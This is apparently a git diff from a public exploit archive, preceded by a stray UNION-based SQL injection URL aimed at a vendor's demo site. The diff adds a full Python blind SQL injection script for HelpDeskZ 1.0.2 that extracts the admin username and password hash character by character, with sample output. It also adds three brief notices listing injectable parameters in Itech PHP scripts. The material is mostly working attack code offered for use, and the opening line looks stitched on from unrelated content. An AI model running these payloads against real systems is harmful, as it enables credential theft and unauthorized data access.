http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# diff --git a/platforms/php/webapps/41200.py b/platforms/php/webapps/41200.py new file mode 100755 index 000000000..434c9ea39 --- /dev/null +++ b/platforms/php/webapps/41200.py @@ -0,0 +1,172 @@ +''' +# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download +# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket +# Date: 2017-01-30 +# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl ) +# Vendor Homepage: http://www.helpdeskz.com/ +# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip +# Version: <= v1.0.2 +# Tested on: +# CVE : + +HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments. + +Software after ticket submit allow to download attachment by entering following link: +http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1(ATTACHMENT_ID_HERE) + +FILE: view_tickets_controller.php +LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]); + +third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization + + +Steps to reproduce: + +http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1 or id>0 -- - + + +by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment. + +Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD) + +steps: +1. go to http://192.168.100.115/helpdesk/?v=submit_ticket +2. Submit a ticket with valid email (important we need password access). +3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query). +4. Get the password from email. +4. run script + +root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123 + +where http://192.168.100.115/helpdesk/ = base url to helpdesk +localhost@localhost.com = email which we use to submit the ticket +password123 = password that system sent to our email + +Output of script: +root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123 +2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk +2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/ +2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login +2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets +2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket¶m[]=6¶m[]=attachment¶m[]=1¶m[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20- +... +------------------------------------------ +username: admin +password: sha256(53874ea55571329c04b6998d9c7772c9274d3781) + +''' +import requests +import sys + +if( len(sys.argv) < 3): + print "put proper data like in example, remember to open a ticket before.... " + print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123" + exit() +EMAIL = sys.argv[2] +PASSWORD = sys.argv[3] + +URL = sys.argv[1] + +def get_token(content): + token = content + if "csrfhash" not in token: + return "error" + token = token[token.find('csrfhash" value="'):len(token)] + if '" />' in token: + token = token[token.find('value="')+7:token.find('" />')] + else: + token = token[token.find('value="')+7:token.find('"/>')] + return token + +def get_ticket_id(content): + ticketid = content + if "param[]=" not in ticketid: + return "error" + ticketid = ticketid[ticketid.find('param[]='):len(ticketid)] + ticketid = ticketid[8:ticketid.find('"')] + return ticketid + + +def main(): + + # Start a session so we can have persistant cookies + session = requests.session(config={'verbose': sys.stderr}) + + r = session.get(URL+"") + + #GET THE TOKEN TO LOGIN + TOKEN = get_token(r.content) + if(TOKEN=="error"): + print "cannot find token" + exit(); + #Data for login + login_data = { + 'do': 'login', + 'csrfhash': TOKEN, + 'email': EMAIL, + 'password': PASSWORD, + 'btn': 'Login' + } + + # Authenticate + r = session.post(URL+"/?v=login", data=login_data) + #GET ticketid + ticket_id = get_ticket_id(r.content) + if(ticket_id=="error"): + print "ticketid not found, open a ticket first" + exit() + target = URL +"?v=view_tickets&action=ticket¶m[]="+ticket_id+"¶m[]=attachment¶m[]=1¶m[]=1" + + limit = 1 + char = 47 + prefix=[] + while(char!=123): + target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_prefix).content + if "couldn't find" not in response: + prefix.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + table_prefix = ''.join(chr(i) for i in prefix) + table_prefix = table_prefix[0:table_prefix.find('staff')] + + limit = 1 + char = 47 + admin_u=[] + while(char!=123): + target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_username).content + if "couldn't find" not in response: + admin_u.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + + limit = 1 + char = 47 + admin_pw=[] + while(char!=123): + target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_password).content + if "couldn't find" not in response: + admin_pw.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + + + admin_username = ''.join(chr(i) for i in admin_u) + admin_password = ''.join(chr(i) for i in admin_pw) + + print "------------------------------------------" + print "username: "+admin_username + print "password: sha256("+admin_password+")" + if admin_username=="" and admin_password=='': + print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_" + print "try to submit ticket with attachment" +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/platforms/php/webapps/41201.txt b/platforms/php/webapps/41201.txt new file mode 100755 index 000000000..e04062220 --- /dev/null +++ b/platforms/php/webapps/41201.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Itech Classifieds Script v7.27 - 'pid' Parameter SQL Injection +# Google Dork: N/A +# Date: 30.01.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Buy: http://itechscripts.com/classifieds-script/ +# Demo: http://itechscripts.com/classifieds-script/ +# Version: 7.27 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/message.php?pid=[SQL] +# E.t.c +# # # # # + + \ No newline at end of file diff --git a/platforms/php/webapps/41202.txt b/platforms/php/webapps/41202.txt new file mode 100755 index 000000000..af4b9eb17 --- /dev/null +++ b/platforms/php/webapps/41202.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Itech Dating Script v3.26 - 'send_gift.php' SQL Injection +# Google Dork: N/A +# Date: 30.01.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Buy: http://itechscripts.com/dating-script/ +# Demo: http://dating.itechscripts.com/ +# Version: 3.26 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/send_gift.php?id=[SQL] +# E.t.c +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41203.txt b/platforms/php/webapps/41203.txt new file mode 100755 index 000000000..4879f0c09 --- /dev/null +++ b/platforms/php/webapps/41203.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Itech Real Estate Script v3.12 - 'id' Parameter SQL Injection +# Google Dork: N/A +# Date: 30.01.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Buy: http://itechscripts.com/real-estate-script/ +# Demo: http://real-estate.itechscripts.com +# Version: 3.12 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/agent_search_property.php?id=[SQL] +# E.t.c +# # # # # \ No newline at end of file diff --git a/platforms/windows/local/11112.c b/platforms/win_x86/local/11112.c similarity index 100% rename from platforms/windows/local/11112.c rename to platforms/win_x86/local/11112.c diff --git a/platforms/windows/local/18861.php b/platforms/win_x86/local/18861.php similarity index 96% rename from platforms/windows/local/18861.php rename to platforms/win_x86/local/18861.php index 0ead77896..660fc68ad 100755 --- a/platforms/windows/local/18861.php +++ b/platforms/win_x86/local/18861.php @@ -13,7 +13,7 @@ 0day
PHP 5.4.3 0day by 0in & cOndis
-